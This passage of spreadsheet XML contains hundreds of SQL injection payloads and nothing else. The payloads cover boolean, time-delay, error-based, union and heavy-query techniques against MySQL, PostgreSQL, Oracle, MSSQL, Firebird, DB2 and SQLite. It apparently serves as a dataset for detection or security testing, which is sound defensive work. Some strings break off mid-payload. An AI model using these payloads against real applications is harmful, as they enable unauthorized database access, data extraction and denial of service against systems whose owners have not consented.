    <t>1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'vjnf' like 'vjnf</t>
  </si>
  <si>
    <t>1'  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 2132 = 8969 )  then 1 else 2132* ( select 2132 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' and 7533 = 7533 and 'jwgc' = 'jwgc</t>
  </si>
  <si>
    <t>1' )  as njfg where 6392 = 6392 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-4873'  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) # kfza</t>
  </si>
  <si>
    <t>1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'qtfl' = 'qtfl</t>
  </si>
  <si>
    <t>1  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>if ( 4194 = 4133 )  select 4194 else drop function tqhz--</t>
  </si>
  <si>
    <t>-2214' )  union all select 8228#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and elt ( 3138 = 1817,1817 ) </t>
  </si>
  <si>
    <t>1' )  and 7533 = 7533 and  ( 'cryr' = 'cryr</t>
  </si>
  <si>
    <t>select  ( case when  ( 6045 = 2786 )  then 6045 else 1/ ( select 0 )  end ) --</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</si>
  <si>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</si>
  <si>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select case when 6662 = 9889 then 1 else null end--</t>
  </si>
  <si>
    <t>select * from generate_series ( 9964,9964,case when  ( 9964 = 4455 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' where 1230 = 1230 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and sleep ( 5 )  and   (  (   ( "fdvc" like "fdvc</t>
  </si>
  <si>
    <t>select  ( case when  ( 7169 = 7785 )  then 1 else 7169* ( select 7169 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and 'gbpg' = 'gbpg</t>
  </si>
  <si>
    <t>select * from generate_series ( 6200,6200,case when  ( 6200 = 5449 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and 'gpax' = 'gpax</t>
  </si>
  <si>
    <t>-8600" or elt ( 1032 = 1032,3623 )  and "kfsn" like "kfsn</t>
  </si>
  <si>
    <t>1"  )  )   as xcyo where 2929 = 2929</t>
  </si>
  <si>
    <t>1"  )  )   )  and 7135 = 8805#</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ||'</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>1  )  )   as pmff where 6649 = 6649</t>
  </si>
  <si>
    <t>1'+ ( select ksoh where 6339 = 6339</t>
  </si>
  <si>
    <t>1%"  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1%' or elt ( 6272 = 6272,sleep ( 5  )  )   and '%' = '</t>
  </si>
  <si>
    <t>1%' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'ugum' like 'ugum</t>
  </si>
  <si>
    <t>select  ( case when  ( 9130 = 1826 )  then 9130 else 9130* ( select 9130 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 5142 = 6855 )  then 5142 else 5142* ( select 5142 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1" )  where 9359 = 9359 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>1 )  where 1415 = 1415 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>1  )  )   as oqyo where 7995 = 7995</t>
  </si>
  <si>
    <t>1"  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  "nubc" like "nubc</t>
  </si>
  <si>
    <t>1 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) -- xwoo</t>
  </si>
  <si>
    <t>1" )  as ronb where 9368 = 9368</t>
  </si>
  <si>
    <t>1'  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'ewwi' = 'ewwi</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1%"  )  )   )  and  ( 3502 = 7893 ) *7893 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'vpus' = 'vpus</t>
  </si>
  <si>
    <t xml:space="preserve">1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) </t>
  </si>
  <si>
    <t>1' )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'xikz' like 'xikz</t>
  </si>
  <si>
    <t>-7347"  )  )   union all select 4360,4360,4360,4360,4360,4360,4360,4360,4360#</t>
  </si>
  <si>
    <t>1' in boolean mode )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) #</t>
  </si>
  <si>
    <t>-3587' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t>1" )  and 2954 = 1256--</t>
  </si>
  <si>
    <t>1"  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "fuus" like "fuus</t>
  </si>
  <si>
    <t>1%'  )  )   or sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   as ijyi where 3694 = 3694  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t>1'+ ( select 'tjvt' where 2463 = 2463</t>
  </si>
  <si>
    <t>-5288' )  or make_set ( 1164 = 1710,1710 )  and  ( 'pkwy' = 'pkwy</t>
  </si>
  <si>
    <t>-7072' )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1' where 1272 = 1272 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as tpeh where 6306 = 6306 and 5965 = 5806#</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  #</t>
  </si>
  <si>
    <t>1%"  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1  )  )   as rqbo where 2243 = 2243 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'gbyh' from dual where 5889 = 5889 order by 1#</t>
  </si>
  <si>
    <t>1  )  )   as eigk where 2557 = 2557</t>
  </si>
  <si>
    <t>1'+ ( select qjng where 1897 = 1897 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  +'</t>
  </si>
  <si>
    <t>1" )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-3013' )  where 2027 = 2027 union all select 2027,2027,2027,2027--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'gsup' = 'gsup</t>
  </si>
  <si>
    <t>-5560"  )  )   or 7292 = 6184#</t>
  </si>
  <si>
    <t>1%" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1%'  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select 'ycvl' where 8415 = 8415 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" )  as sstd where 9629 = 9629 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>1' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'pbqg' = 'pbqg</t>
  </si>
  <si>
    <t>-6158"  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'+ ( select papc where 8900 = 8900 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 )  as kqas where 7302 = 7302 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "obau" = "obau</t>
  </si>
  <si>
    <t>1" )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "ctzh" = "ctzh</t>
  </si>
  <si>
    <t>1 )  where 2083 = 2083</t>
  </si>
  <si>
    <t>1" and 4595 = 4595#</t>
  </si>
  <si>
    <t xml:space="preserve">-9553  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( </t>
  </si>
  <si>
    <t>1" rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and "qfhv" = "qfhv</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( "memh" like "memh</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and "rukx" like "rukx</t>
  </si>
  <si>
    <t>1%"  )  )   rlike sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   as jucs where 6836 = 6836</t>
  </si>
  <si>
    <t>1' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'mptm' = 'mptm</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3--</t>
  </si>
  <si>
    <t>1' where 6963 = 6963 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1',iif ( 9496 = 4153,1,1/0 ) </t>
  </si>
  <si>
    <t>-8625 or 3176 = 2519# fvgl</t>
  </si>
  <si>
    <t>1%'  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1"  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "hmun" = "hmun</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) </t>
  </si>
  <si>
    <t>1%" )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1" )  where 5491 = 5491</t>
  </si>
  <si>
    <t>-5748' union all select 1224,1224,1224,1224,1224,1224,1224,1224,1224#</t>
  </si>
  <si>
    <t>1%"  )  )   )  and make_set ( 8191 = 7813,7813 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-4515" )  or elt ( 4545 = 2509,2509 )  and  ( "lglx" = "lglx</t>
  </si>
  <si>
    <t xml:space="preserve">1' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) </t>
  </si>
  <si>
    <t>1 where 1931 = 1931 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>-1526'  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  'xpob' = 'xpob</t>
  </si>
  <si>
    <t>1%" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and "%" = "</t>
  </si>
  <si>
    <t>-2643%" union all select 7779,7779--</t>
  </si>
  <si>
    <t>select  ( case when  ( 2783 = 9216 )  then 1 else 2783* ( select 2783 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1" )  as qwyt where 4236 = 4236 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 5249 = 9648 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t>-6792  )  )   as zlho where 4758 = 4758 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 11</t>
  </si>
  <si>
    <t>-9032  )  )   union all select 8377,8377,8377,8377,8377,8377,8377,8377,8377#</t>
  </si>
  <si>
    <t>1%' or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-6546" )  order by 1#</t>
  </si>
  <si>
    <t>1'|| ( select 'ukfj' where 7133 = 7133 union all select null,null,null#</t>
  </si>
  <si>
    <t>1%" )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" )  as yphz where 8174 = 8174 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as wves where 2641 = 2641 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">-3472' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) </t>
  </si>
  <si>
    <t>1'  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'uorw' like 'uorw</t>
  </si>
  <si>
    <t>-4739'  )  )   union all select 6585,6585,6585,6585,6585--</t>
  </si>
  <si>
    <t>1' )  where 9317 = 9317 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-1257' )  order by 1#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7442 )  or 3391 = 7492</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( 'ywbs' = 'ywbs</t>
  </si>
  <si>
    <t>1"  )  )   as uxnc where 8041 = 8041 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1%' )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1%" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 'aduc' = 'aduc</t>
  </si>
  <si>
    <t>1'+ ( select idnb where 2338 = 2338</t>
  </si>
  <si>
    <t>-4557%'  )  )   or 4537 = 3401 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( 'aiuy' = 'aiuy</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null#</t>
  </si>
  <si>
    <t>1 where 2649 = 2649 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'lstx' from dual where 2972 = 2972 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 1570 = 1570 )  then  ( select 1570 from pg_sleep ( 5  )  )   else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%'  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%' )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1" )  as lgxc where 1117 = 1117 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' where 2391 = 2391 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  where 3588 = 3588</t>
  </si>
  <si>
    <t>1 )  where 7165 = 7165 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'+ ( select xzse where 4530 = 4530</t>
  </si>
  <si>
    <t>1%"  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>if ( 3245 = 6168 )  select 3245 else drop function nafj--</t>
  </si>
  <si>
    <t>select * from generate_series ( 3086,3086,case when  ( 3086 = 3327 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1'  )  )   as oocd where 2919 = 2919 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1 )  as iknl where 3885 = 3885 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>select * from generate_series ( 1134,1134,case when  ( 1134 = 4909 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t xml:space="preserve">-7551 or elt ( 6900 = 7195,7195 ) </t>
  </si>
  <si>
    <t>1'|| ( select 'lljg' from dual where 7631 = 7631</t>
  </si>
  <si>
    <t>1" where 7828 = 7828</t>
  </si>
  <si>
    <t>1  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  5874 = 5874</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( "ekbq" = "ekbq</t>
  </si>
  <si>
    <t>1"  )  )   as ubrg where 7318 = 7318 and 7331 = 6529--</t>
  </si>
  <si>
    <t xml:space="preserve">1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t>1" and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "xhvo" = "xhvo</t>
  </si>
  <si>
    <t>1%' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( "awyk" like "awyk</t>
  </si>
  <si>
    <t>1'|| ( select 'fdkl' where 4572 = 4572 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%' and 9198 = 9198--</t>
  </si>
  <si>
    <t>-7916'  )  )   union all select 9299,9299,9299,9299,9299,9299,9299,9299,9299,9299#</t>
  </si>
  <si>
    <t>1'  )  )   as jvwq where 6596 = 6596 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq ) # gkkx</t>
  </si>
  <si>
    <t>-8792 union all select 1246,1246,1246,1246,1246,1246,1246--</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( "felm" = "felm</t>
  </si>
  <si>
    <t>1" )  where 8407 = 8407 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-1272' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1' )  where 7537 = 7537 and 2006 = 2006</t>
  </si>
  <si>
    <t>-3710  )  )   union all select 5770,5770,5770,5770,5770,5770,5770#</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "hcjz" like "hcjz</t>
  </si>
  <si>
    <t>-4828'+ ( select qxnw where 9488 = 9488 union all select 9488,9488--</t>
  </si>
  <si>
    <t>1' )  as hcpp where 1863 = 1863</t>
  </si>
  <si>
    <t>1" and sleep ( 5 )  and "masm" = "masm</t>
  </si>
  <si>
    <t>1' in boolean mode )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) #</t>
  </si>
  <si>
    <t>1" )  where 5197 = 5197 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-3733'  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t xml:space="preserve">-8099%'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr </t>
  </si>
  <si>
